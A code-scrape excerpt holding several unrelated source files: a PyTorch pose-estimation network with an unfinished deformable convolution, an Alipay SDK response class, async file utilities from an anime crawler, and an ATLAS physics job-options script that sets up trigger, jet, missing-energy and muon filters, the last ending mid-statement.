#initExclude() | mantiser-com/finder-email | exclude/initExclude.py | initExclude.py | py | 863 | python | en | code | 0 | github-code | 13 |
72678372498 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import logging
import torch
import torch.nn as nn
import numpy
# from DCNv2 import dcn_v2_conv, DCNv2, DCN
# from DCNv2 import dcn_v2_pooling, DCNv2Pooling, DCNPooling
# import layers.ConvOffset2D
BN_MOMENTUM = 0.1
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
    """Bias-free 3x3 convolution that preserves spatial size (padding=1)."""
    return nn.Conv2d(
        in_planes,
        out_planes,
        kernel_size=3,
        stride=stride,
        padding=1,
        bias=False,
    )
class BasicBlock(nn.Module):
    """Two-convolution residual block (ResNet-18/34 style)."""

    expansion = 1

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(BasicBlock, self).__init__()
        # First conv may downsample (stride); second always keeps the size.
        self.conv1 = conv3x3(inplanes, planes, stride)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.conv2 = conv3x3(planes, planes)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        # Optional projection applied to the shortcut path.
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out = out + shortcut
        return self.relu(out)
class Bottleneck(nn.Module):
    """1x1 -> 3x3 -> 1x1 bottleneck residual block (ResNet-50 style)."""

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        # Channel reduction, spatial conv (may stride), channel expansion.
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
                               bias=False)
        self.bn3 = nn.BatchNorm2d(planes * self.expansion,
                                  momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        # Optional projection applied to the shortcut path.
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        return self.relu(out + shortcut)
class DeformConv2d(nn.Module):
    """Experimental deformable 2-D convolution (Deformable ConvNets style).

    ``p_conv`` predicts per-position sampling offsets; the input is
    resampled at the offset positions and the result is fed through the
    main ``conv``.  NOTE(review): this block looks work-in-progress --
    several helpers hard-code a 3x3 kernel (the literal ``9``),
    ``_get_p_0`` hard-codes an 8x6 output grid, the bilinear-interpolation
    code is commented out (the current ``x_offset`` is built from the
    interpolation weights only, not from sampled input values), and the
    forward pass still contains debug ``print`` calls.
    """
    def __init__(self, inc, outc, kernel_size=3, padding=1, stride=1, bias=None, modulation=False):
        """
        Args:
            inc: input channels.
            outc: output channels.
            kernel_size: kernel size (helpers below assume 3).
            padding: stored but currently unused (zero_padding commented out).
            stride: stride of the offset branch.
            bias: forwarded to the main nn.Conv2d.
            modulation (bool, optional): If True, Modulated Defomable Convolution (Deformable ConvNets v2).
        """
        super(DeformConv2d, self).__init__()
        self.kernel_size = kernel_size
        self.padding = padding
        self.stride = stride
        # self.zero_padding = nn.ZeroPad2d(padding)
        # Main conv runs with stride=kernel_size over the ks-times-unrolled map.
        self.conv = nn.Conv2d(inc, outc, kernel_size=kernel_size, stride=kernel_size, bias=bias)
        # Offset branch: 2 offsets (x and y) per kernel position.
        self.p_conv = nn.Conv2d(inc, 2*kernel_size*kernel_size, kernel_size=3, padding=1, stride=stride)
        nn.init.constant_(self.p_conv.weight, 0)
        self.p_conv.register_backward_hook(self._set_lr)
        self.modulation = modulation
        if modulation:
            # Modulation branch: one scalar weight per kernel position (v2).
            self.m_conv = nn.Conv2d(inc, kernel_size*kernel_size, kernel_size=3, padding=1, stride=stride)
            nn.init.constant_(self.m_conv.weight, 0)
            self.m_conv.register_backward_hook(self._set_lr)
    @staticmethod
    def _set_lr(module, grad_input, grad_output):
        # NOTE(review): these build generator expressions that are assigned
        # to locals and never consumed, so this hook has no effect on the
        # gradients as written.
        grad_input = (grad_input[i] * 0.1 for i in range(len(grad_input)))
        grad_output = (grad_output[i] * 0.1 for i in range(len(grad_output)))
    def forward(self, x):
        # Predicted sampling offsets, shape (b, 2*ks*ks, h, w).
        offset = self.p_conv(x)
        #(32,18,8,6)
        if self.modulation:
            m = torch.sigmoid(self.m_conv(x))
        dtype = offset.data.type()
        ks = self.kernel_size
        N = offset.size(1) // 2
        # if self.padding:
        #     x = self.zero_padding(x)
        # (b, 2N, h, w) -- absolute sampling positions p = p_0 + p_n + offset
        p = self._get_p(offset, dtype)
        # (b, h, w, 2N)
        p = p.contiguous().permute(0, 2, 3, 1)
        #(32,8,6,18)
        # print(p.shape)
        # Integer corner positions around each fractional sample point;
        # the literal 9 below assumes kernel_size == 3.
        q_c = p.detach().floor()
        q_lt = p.detach().floor()
        q_rb = q_lt + 1
        # print(q_lt)
        q_lt = torch.cat([torch.clamp(q_lt[:, :9], 0, x.size(2)-1), torch.clamp(q_lt[:, 9:], 0, x.size(3)-1)], dim=-1).long()
        q_rb = torch.cat([torch.clamp(q_rb[:, :9], 0, x.size(2)-1), torch.clamp(q_rb[:, 9:], 0, x.size(3)-1)], dim=-1).long()
        q_lb = torch.cat([q_lt[:, :9], q_rb[:, 9:]], dim=-1)
        q_rt = torch.cat([q_rb[:, :9], q_lt[:, 9:]], dim=-1)
        # print("q_lt",q_lt.shape)
        # print("q_rb",q_rb.shape)
        # print("q_lb",q_lb.shape)
        # print("q_rt",q_rt.shape)
        # clip p
        # p = torch.cat([torch.clamp(p[:, :9], 0, x.size(2)-1), torch.clamp(p[:, 9:], 0, x.size(3)-1)], dim=-1)
        q_c = torch.cat([torch.clamp(q_c[:, :9], 0, x.size(2)-1), torch.clamp(q_c[:, 9:], 0, x.size(3)-1)], dim=-1)
        # print(q_c.shape)
        # print("1")
        # bilinear kernel (b, h, w, N)
        # print((1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9])).shape)
        # print((1 + (q_lt[:, 9:].type_as(q_c) - q_c[:, 9:])).shape)
        # print("2")
        # g_lt = (1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9])) * (1 + (q_lt[:, 9:].type_as(q_c) - q_c[:, 9:]))
        # g_rb = (1 - (q_rb[:, :9].type_as(q_c) - q_c[:, :9])) * (1 - (q_rb[:, 9:].type_as(q_c) - q_c[:, 9:]))
        # g_lb = (1 + (q_lb[:, :9].type_as(q_c) - q_c[:, :9])) * (1 - (q_lb[:, 9:].type_as(q_c) - q_c[:, 9:]))
        # g_rt = (1 - (q_rt[:, :9].type_as(q_c) - q_c[:, :9])) * (1 + (q_rt[:, 9:].type_as(q_c) - q_c[:, 9:]))
        # NOTE(review): only the x-direction factor of each bilinear weight
        # is kept here; the full products are commented out above.
        g_lt = (1 + (q_lt[:, :9].type_as(q_c) - q_c[:, :9]))
        g_rb = (1 - (q_rb[:, :9].type_as(q_c) - q_c[:, :9]))
        g_lb = (1 + (q_lb[:, :9].type_as(q_c) - q_c[:, :9]))
        g_rt = (1 - (q_rt[:, :9].type_as(q_c) - q_c[:, :9]))
        # print("g_lt",g_lt.shape)
        # print("g_rb",g_rb.shape)
        # print("g_lb",g_lb.shape)
        # print("g_rt",g_rt.shape)
        # (b, c, h, w, N)
        # print(x.shape)
        # print(g_lt.unsqueeze(dim=1).shape)
        # p1=x
        # x_q_lt = self._get_x_q(p1, q_lt, 9)
        # print((g_lt.unsqueeze(dim=1) * x_q_lt).shape)
        # p2=x
        # x_q_rb = self._get_x_q(p2, q_rb, 9)
        # p3=x
        # x_q_lb = self._get_x_q(p3, q_lb, 9)
        # p4=x
        # x_q_rt = self._get_x_q(p4, q_rt, 9)
        # print("11112222")
        # (b, c, h, w, N)
        # x_offset = g_lt.unsqueeze(dim=1) * x_q_lt + \
        #            g_rb.unsqueeze(dim=1) * x_q_rb + \
        #            g_lb.unsqueeze(dim=1) * x_q_lb + \
        #            g_rt.unsqueeze(dim=1) * x_q_rt
        # NOTE(review): with the sampling (_get_x_q) commented out, x_offset
        # is the sum of the weight maps only -- the input features are not
        # actually sampled here.
        x_offset = g_lt.unsqueeze(dim=1) + \
                   g_rb.unsqueeze(dim=1) + \
                   g_lb.unsqueeze(dim=1) + \
                   g_rt.unsqueeze(dim=1)
        print(x_offset.shape)
        # modulation
        if self.modulation:
            m = m.contiguous().permute(0, 2, 3, 1)
            m = m.unsqueeze(dim=1)
            m = torch.cat([m for _ in range(x_offset.size(1))], dim=1)
            x_offset *= m
        print("111")
        x_offset = self._reshape_x_offset(x_offset, ks)
        print("x_offset",x_offset.type)
        out = self.conv(x_offset)
        return out
    def _get_p_n(self, N, dtype):
        # Relative kernel-grid coordinates, e.g. (-1..1)x(-1..1) for ks=3.
        p_n_x, p_n_y = torch.meshgrid(
            [torch.arange(-(self.kernel_size-1)//2, (self.kernel_size-1)//2+1),
             torch.arange(-(self.kernel_size-1)//2, (self.kernel_size-1)//2+1)])
        # (2N, 1)
        p_n = torch.cat([torch.flatten(p_n_x), torch.flatten(p_n_y)], 0)
        p_n = p_n.view(1, 2*N, 1, 1).type(dtype)
        #(1,18,1,1)
        return p_n
    def _get_p_0(self, h, w, N, dtype):
        # NOTE(review): the h and w arguments are ignored -- the base grid
        # is hard-coded to 8x6 positions (arange(1,17,2) x arange(1,13,2)).
        tmp1 = torch.arange(1, 17, 2)
        tmp2 = torch.arange(1, 13, 2)
        p_0_x, p_0_y = torch.meshgrid([tmp1,tmp2])
        p_0_x = torch.flatten(p_0_x).view(1, 1, 8, 6).repeat(1, 9, 1, 1)
        p_0_y = torch.flatten(p_0_y).view(1, 1, 8, 6).repeat(1, 9, 1, 1)
        p_0 = torch.cat([p_0_x, p_0_y], 1).type(dtype)
        #(1,18,8,6)
        return p_0
    def _get_p(self, offset, dtype):
        #(9,8,6)
        N, h, w = offset.size(1)//2, offset.size(2), offset.size(3)
        # (1, 2N, 1, 1)
        p_n = self._get_p_n(N, dtype)
        # (1, 2N, h, w)
        p_0 = self._get_p_0(h, w, N, dtype)
        # Absolute sampling positions: base grid + kernel grid + learned offset.
        p = p_0 + p_n + offset
        #(32,18,8,6)
        return p
    def _get_x_q(self, x, q, N):
        # Gather input values at the integer positions q (flattened h*w index).
        b, h, w, _ = q.size()
        padded_w = x.size(3)
        c = x.size(1)
        # (b, c, h*w)
        x = x.contiguous().view(b, c, -1)
        # print(x.shape)
        # (b, h, w, N)
        index = q[..., :N]*padded_w + q[..., N:]  # offset_x*w + offset_y
        # (b, c, h*w*N)
        index = index.contiguous().unsqueeze(dim=1).expand(-1, c, -1, -1, -1).contiguous().view(b, c, -1)
        # print(index.shape)
        #(32,512,432)
        x_c = x
        print("333")
        x_offset = torch.gather(x_c,dim=-1,index=index).contiguous().view(b, c, h, w, N)
        # print(a.shape)
        # x_offset = x.gather(dim=-1, index=index).contiguous().view(b, c, h, w, N)
        print("x_offset",x_offset.shape)
        return x_offset
    @staticmethod
    def _reshape_x_offset(x_offset, ks):
        # Unroll the per-kernel-position dimension into the spatial dims:
        # (b, c, h, w, N) -> (b, c, h*ks, w*ks).
        b, c, h, w, N = x_offset.size()
        x_offset = torch.cat([x_offset[:, s:s+ks].contiguous().view(b, c, h, w*ks) for s in range(0, N, ks)], dim=-1)
        print("222")
        x_offset = x_offset.contiguous().view(b, c, h*ks, w*ks)
        return x_offset
class Bottleneck_defo(nn.Module):
    """Bottleneck residual block whose 3x3 stage is a deformable conv."""

    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck_defo, self).__init__()
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        # Deformable 3x3 stage (see DeformConv2d).
        self.conv2 = DeformConv2d(planes, planes, kernel_size=3, stride=stride,
                                  padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
        self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
                               bias=False)
        self.bn3 = nn.BatchNorm2d(planes * self.expansion,
                                  momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        shortcut = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        #(32,512,16,12)
        out = self.conv2(out)
        print("2",out.shape)  # leftover debug trace, kept for output parity
        out = self.relu(self.bn2(out))
        out = self.bn3(self.conv3(out))
        return self.relu(out + shortcut)
class posemodel(nn.Module):
    """ResNet backbone + deconvolution head for pose-heatmap regression.

    Stages 1-3 use the supplied residual ``block``; stage 4 always uses
    ``Bottleneck_defo`` (deformable conv).  The head is a stack of
    ConvTranspose2d layers followed by a final conv producing one heatmap
    per joint (``cfg.MODEL.NUM_JOINTS``).
    """
    def __init__(self, block, layers, cfg, **kwargs):
        self.inplanes = 64
        extra = cfg.MODEL.EXTRA
        self.deconv_with_bias = extra.DECONV_WITH_BIAS

        super(posemodel, self).__init__()
        # Stem: 7x7/2 conv + BN + ReLU + 3x3/2 max-pool (4x downsampling).
        self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
        self.relu = nn.ReLU(inplace=True)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, 64, layers[0])
        self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
        self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
        # Stage 4 is forced to the deformable bottleneck, ignoring ``block``.
        block1 = Bottleneck_defo
        self.layer4 = self._make_layer(block1, 512, layers[3], stride=2)

        # used for deconv layers
        self.deconv_layers = self._make_deconv_layer(
            extra.NUM_DECONV_LAYERS,
            extra.NUM_DECONV_FILTERS,
            extra.NUM_DECONV_KERNELS,
        )

        # One output channel per joint heatmap.
        self.final_layer = nn.Conv2d(
            in_channels=extra.NUM_DECONV_FILTERS[-1],
            out_channels=cfg.MODEL.NUM_JOINTS,
            kernel_size=extra.FINAL_CONV_KERNEL,
            stride=1,
            padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0
        )

    def _make_layer(self, block, planes, blocks, stride=1):
        """Stack ``blocks`` residual blocks; the first one may downsample
        and gets a 1x1 projection on its shortcut when shapes change."""
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
            )

        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))

        return nn.Sequential(*layers)

    def _get_deconv_cfg(self, deconv_kernel, index):
        """Map a deconv kernel size to its (kernel, padding, output_padding).

        NOTE(review): kernel sizes other than 4/3/2 leave ``padding`` and
        ``output_padding`` unassigned and would raise NameError on return.
        """
        if deconv_kernel == 4:
            padding = 1
            output_padding = 0
        elif deconv_kernel == 3:
            padding = 1
            output_padding = 1
        elif deconv_kernel == 2:
            padding = 0
            output_padding = 0

        return deconv_kernel, padding, output_padding

    def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
        """Build the upsampling head: num_layers x (ConvTranspose2d+BN+ReLU),
        each doubling the spatial resolution (stride=2)."""
        assert num_layers == len(num_filters), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'
        assert num_layers == len(num_kernels), \
            'ERROR: num_deconv_layers is different len(num_deconv_filters)'

        layers = []
        for i in range(num_layers):
            kernel, padding, output_padding = \
                self._get_deconv_cfg(num_kernels[i], i)

            planes = num_filters[i]
            layers.append(
                nn.ConvTranspose2d(
                    in_channels=self.inplanes,
                    out_channels=planes,
                    kernel_size=kernel,
                    stride=2,
                    padding=padding,
                    output_padding=output_padding,
                    bias=self.deconv_with_bias))
            layers.append(nn.BatchNorm2d(planes, momentum=BN_MOMENTUM))
            layers.append(nn.ReLU(inplace=True))
            self.inplanes = planes

        return nn.Sequential(*layers)

    def forward(self, x):
        # Backbone ...
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)

        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)

        # ... then upsample and predict the joint heatmaps.
        x = self.deconv_layers(x)
        x = self.final_layer(x)

        return x

    def init_weights(self, pretrained=''):
        """Initialise head weights and load a pretrained backbone checkpoint
        from ``pretrained``; raises ValueError if the file is missing."""
        if os.path.isfile(pretrained):
            logger.info('=> init deconv weights from normal distribution')
            for name, m in self.deconv_layers.named_modules():
                if isinstance(m, nn.ConvTranspose2d):
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    if self.deconv_with_bias:
                        nn.init.constant_(m.bias, 0)
                elif isinstance(m, nn.BatchNorm2d):
                    logger.info('=> init {}.weight as 1'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.constant_(m.weight, 1)
                    nn.init.constant_(m.bias, 0)
            logger.info('=> init final conv weights from normal distribution')
            for m in self.final_layer.modules():
                if isinstance(m, nn.Conv2d):
                    # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
                    # NOTE(review): ``name`` here leaks from the previous
                    # loop, so these log lines report the wrong module name.
                    logger.info('=> init {}.weight as normal(0, 0.001)'.format(name))
                    logger.info('=> init {}.bias as 0'.format(name))
                    nn.init.normal_(m.weight, std=0.001)
                    nn.init.constant_(m.bias, 0)
            pretrained_state_dict = torch.load(pretrained)
            logger.info('=> loading pretrained model {}'.format(pretrained))
            self.load_state_dict(pretrained_state_dict, strict=False)
        else:
            logger.error('=> imagenet pretrained model dose not exist')
            logger.error('=> please download it first')
            raise ValueError('imagenet pretrained model does not exist')
# Depth -> (residual block class, blocks per stage) for the standard
# ResNet variants; consumed by get_pose_net below.
resnet_spec = {18: (BasicBlock, [2, 2, 2, 2]),
               34: (BasicBlock, [3, 4, 6, 3]),
               50: (Bottleneck, [3, 4, 6, 3]),
               101: (Bottleneck, [3, 4, 23, 3]),
               152: (Bottleneck, [3, 8, 36, 3])}
def get_pose_net(cfg, is_train, **kwargs):
    """Build a posemodel for the ResNet depth given in ``cfg``.

    When training and ``cfg.MODEL.INIT_WEIGHTS`` is set, the pretrained
    checkpoint at ``cfg.MODEL.PRETRAINED`` is loaded.
    """
    depth = cfg.MODEL.EXTRA.NUM_LAYERS
    block_class, layers = resnet_spec[depth]
    net = posemodel(block_class, layers, cfg, **kwargs)
    if is_train and cfg.MODEL.INIT_WEIGHTS:
        net.init_weights(cfg.MODEL.PRETRAINED)
    return net
| chenrobin/DVLPose- | lib/models/deformation.py | deformation.py | py | 17,661 | python | en | code | 0 | github-code | 13 |
17092790154 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.OperatorBaseInfo import OperatorBaseInfo
class KoubeiMerchantOperatorSearchQueryResponse(AlipayResponse):
    """Response model for the koubei.merchant.operator.search.query API.

    Auto-generated Alipay-SDK style: plain properties plus a
    ``parse_response_content`` that copies fields out of the decoded JSON.
    """

    def __init__(self):
        super(KoubeiMerchantOperatorSearchQueryResponse, self).__init__()
        # List of OperatorBaseInfo entries returned by the search.
        self._operator_list = None
        # Total match count (presumably for paging -- not enforced here).
        self._total = None

    @property
    def operator_list(self):
        return self._operator_list

    @operator_list.setter
    def operator_list(self, value):
        # Accepts a list of OperatorBaseInfo objects or of plain dicts,
        # converting dicts via OperatorBaseInfo.from_alipay_dict.
        if isinstance(value, list):
            self._operator_list = list()
            for i in value:
                if isinstance(i, OperatorBaseInfo):
                    self._operator_list.append(i)
                else:
                    self._operator_list.append(OperatorBaseInfo.from_alipay_dict(i))
    @property
    def total(self):
        return self._total

    @total.setter
    def total(self, value):
        self._total = value

    def parse_response_content(self, response_content):
        # Let the base class decode the payload, then pick out our fields.
        response = super(KoubeiMerchantOperatorSearchQueryResponse, self).parse_response_content(response_content)
        if 'operator_list' in response:
            self.operator_list = response['operator_list']
        if 'total' in response:
            self.total = response['total']
| alipay/alipay-sdk-python-all | alipay/aop/api/response/KoubeiMerchantOperatorSearchQueryResponse.py | KoubeiMerchantOperatorSearchQueryResponse.py | py | 1,360 | python | en | code | 241 | github-code | 13 |
15939874987 | import ctypes.wintypes
from pathlib import Path
from typing import Union
import aiofiles
def align(_string, _length, _type='L') -> str:
    """Pad a mixed Chinese/English string to a given display width.

    CJK ideographs (U+4E00..U+9FFF) are counted as two display columns.
    See https://www.jianshu.com/p/74500b7dc278.

    :param _string: string to align
    :param _length: target display width
    :param _type: 'L' left-align (default), 'R' right-align,
        anything else centres the string
    :return: the padded string
    """
    cjk_extra = sum(u'\u4e00' <= ch <= u'\u9fff' for ch in _string)
    pad = _length - (len(_string) + cjk_extra)
    if _type == 'L':
        left, right = 0, pad
    elif _type == 'R':
        left, right = pad, 0
    else:
        left = pad // 2
        right = pad - left
    return ' ' * left + _string + ' ' * right
def folder_path(folder_path):
    '''Ensure a folder exists, creating it if necessary.

    Args:
        folder_path (Path): folder path

    Returns:
        Path: the same folder path

    The previous exists()/mkdir() pair was racy (TOCTOU): another process
    creating the folder between the check and the mkdir made mkdir() raise.
    ``mkdir(exist_ok=True)`` handles that in one call; it still raises if
    the path exists but is not a directory.
    '''
    folder_path.mkdir(exist_ok=True)
    return folder_path
def get_video_path(path_id=14):
    '''Return the current user's Videos folder path (Windows only).

    Args:
        path_id (int, optional): Windows CSIDL constant identifying the
            folder; 14 is CSIDL_MYVIDEO (the user's Videos folder) and
            must not be changed. Defaults to 14.

    Returns:
        str: absolute path of the user's Videos folder.
    '''
    # SHGetFolderPathW fills ``buf`` with the folder for the given CSIDL id.
    buf = ctypes.create_unicode_buffer(ctypes.wintypes.MAX_PATH)
    ctypes.windll.shell32.SHGetFolderPathW(None, path_id, None, 0, buf)
    return buf.value
async def write(
    path: Union[str, Path],
    text: str,
    title: Union[str, int],
    suffix: str = 'txt',
    mode: str = 'w',
):
    '''Write ``text`` to ``<path>/<title>.<suffix>`` using aiofiles.

    The folder is created first if it does not exist (via folder_path).

    Args:
        path (Path): folder to write into.
        text (str): file content.
        title (str): file name without extension.
        suffix (str, optional): file extension. Defaults to 'txt'.
        mode (str, optional): open mode, see
            https://docs.python.org/zh-cn/3.10/library/functions.html#open.
            Defaults to 'w' (the previous docstring wrongly said 'a').
    '''
    folder = folder_path(path)
    async with aiofiles.open(folder / f'{title}.{suffix}', mode) as fp:
        await fp.write(text)
async def merge_ts2mp4(folder_path: Path, episodes: int = None, del_ts: bool = False):
    '''Concatenate every ``.ts`` file in a folder into one mp4.

    Args:
        folder_path (Path): folder containing the ``.ts`` segments.
        episodes (int): episode number used in the output file name.
            Defaults to None.
        del_ts (bool): delete each ``.ts`` segment after it has been
            appended. Defaults to False.

    Note:
        The output is opened in append mode ('ab'), so running this twice
        for the same episode appends the segments again.  Segment order
        follows ``Path.iterdir`` -- presumably the segments are named so
        that this matches playback order; verify against the downloader.
    '''
    for file_path in folder_path.iterdir():
        if file_path.suffix == '.ts':
            async with aiofiles.open(file_path, 'rb') as f1:
                async with aiofiles.open(folder_path / f"第{episodes}集.mp4", 'ab') as f2:
                    await f2.write(await f1.read())
            if del_ts:
                file_path.unlink()
| Senvlin/AnimeCrawler | AnimeCrawler/utils/file.py | file.py | py | 2,917 | python | en | code | 1 | github-code | 13 |
38006098118 |
### configure trigger filters
if len(primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames) == 0:
if rec.triggerStream() == "Egamma":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.EgammaTriggerNames
elif rec.triggerStream() == "JetTauEtmiss":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.JetTauEtmissTriggerNames
elif rec.triggerStream() == "Muons":
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.MuonsTriggerNames
elif rec.triggerStream() == "": # for MC the string will be empty, but we want to use all of the triggers
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = primRPVLLDESDM.VH_DV_triggerFilterFlags.EgammaTriggerNames
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames += primRPVLLDESDM.VH_DV_triggerFilterFlags.JetTauEtmissTriggerNames
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames += primRPVLLDESDM.VH_DV_triggerFilterFlags.MuonsTriggerNames
else:
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = ["dummy"] # back-up, to prevent empty-string failure in test jobs if no triggers used
# get rid of potential doubles in the trigger lists, since attempting to add identical algs generates an ERROR
primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames = list(set(primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames))
triggerFilterNames=[]
from PrimaryDPDMaker.TriggerFilter import TriggerFilter
# Schedule one TriggerFilter algorithm per configured VH_DV trigger chain.
# NOTE(review): triggerFilterNames / filtersToBookkeep / topCmdString are
# assumed to be defined earlier in this job-options file -- confirm upstream.
for trigName in primRPVLLDESDM.VH_DV_triggerFilterFlags.TriggerNames:
    TriggerFilterName = "VH_DV_TriggerFilter_"+trigName
    topSequence += TriggerFilter( TriggerFilterName,
                                  trigger = trigName )
    triggerFilterNames.append( TriggerFilterName )
    pass

# Create a combined filter by ORing together all the trigger filters
combinedTriggerFilterName = "VH_DV_CombinedTriggerFilter"
topSequence += LogicalFilterCombiner( combinedTriggerFilterName )
triggerFilterCounter = 0
cmdstring = ""
# Build the "A or B or C" command string by hand; the counter only serves to
# suppress the leading " or ".
for triggerFilterName in triggerFilterNames :
    if triggerFilterCounter > 0 :
        cmdstring += " or "
        pass
    cmdstring += triggerFilterName
    triggerFilterCounter += 1
    pass
topSequence.VH_DV_CombinedTriggerFilter.cmdstring = cmdstring
filtersToBookkeep+=["VH_DV_CombinedTriggerFilter"]

## a fancy jet filter
from LongLivedParticleDPDMaker.LongLivedParticleDPDMakerConf import FancyJetFilterAlg
jetFilterName = "VH_DV_JetFilter"
topSequence += FancyJetFilterAlg(jetFilterName)
topSequence.VH_DV_JetFilter.cutEtMin=primRPVLLDESDM.VH_DV_jetFilterFlags.jetPtCut
topSequence.VH_DV_JetFilter.minNumberPassed=primRPVLLDESDM.VH_DV_jetFilterFlags.nJetPassed
topSequence.VH_DV_JetFilter.cutSumPtTrkMax=primRPVLLDESDM.VH_DV_jetFilterFlags.MaxSumPtTrk
topSequence.VH_DV_JetFilter.jetCollectionName = "AntiKt4LCTopoJets"
filtersToBookkeep+=["VH_DV_JetFilter"]

## METfilter
from LongLivedParticleDPDMaker.LongLivedParticleDPDMakerConf import DVMETFilterAlg
##from PrimaryDPDMaker.MissingEtFilter import MissingEtFilter
missingetFilterName = 'VH_DV_MissingEtFilter'
topSequence += DVMETFilterAlg(missingetFilterName)
topSequence.VH_DV_MissingEtFilter.cutMetMin = primRPVLLDESDM.VH_DV_missingetFilterFlags.cutMetMin
##topSequence.VH_DV_MissingEtFilter.requireMet = True
filtersToBookkeep+=["VH_DV_MissingEtFilter"]

# Jet AND MET must both pass.
jetMetFilterName = "VH_DV_JetMetFilter"
topSequence += LogicalFilterCombiner( jetMetFilterName)
topSequence.VH_DV_JetMetFilter.cmdstring = "VH_DV_JetFilter and VH_DV_MissingEtFilter"
filtersToBookkeep+=["VH_DV_JetMetFilter"]

from EventUtils.EventUtilsConf import CutAlg
# Muon-stream (or inclusive "" stream) offline selection: at least one muon
# above the pt/eta cuts, combined with the jet+MET requirement.
if rec.triggerStream() == "Muons" or rec.triggerStream() == "":
    cutString="count( Muons.pt > "
    cutString+=str(primRPVLLDESDM.VH_DV_muonFilterFlags.cutEtMin)
    cutString+=" && abs(Muons.eta) < "
    cutString+=str(primRPVLLDESDM.VH_DV_muonFilterFlags.cutEtaMax)
    cutString+=" ) > 0"
    muonFilterName = 'VH_DV_MuonFilter'
    muonFilter = CutAlg(muonFilterName,
                        Cut=cutString)
    topSequence+=muonFilter
    combinedOfflineFilterName = "VH_DV_CombinedMuonsOfflineFilter"
    topSequence += LogicalFilterCombiner( combinedOfflineFilterName )
    cmdstring = "VH_DV_MuonFilter and VH_DV_JetMetFilter"
    topSequence.VH_DV_CombinedMuonsOfflineFilter.cmdstring=cmdstring
    filtersToBookkeep+=["VH_DV_CombinedMuonsOfflineFilter"]

# Egamma-stream (or inclusive "" stream) offline selection: a W-like channel
# (single electron + jet + MET) OR a Z-like channel (di-electron + jet).
if rec.triggerStream() == "Egamma" or rec.triggerStream() == "":
    electronFilterName = 'VH_DV_ElectronFilter'
    cutString="count( "
    cutString+= primRPVLLDESDM.VH_DV_electronFilterFlags.electronCollectionName
    cutString+=".pt > "
    cutString += str(primRPVLLDESDM.VH_DV_electronFilterFlags.cutEtMin)
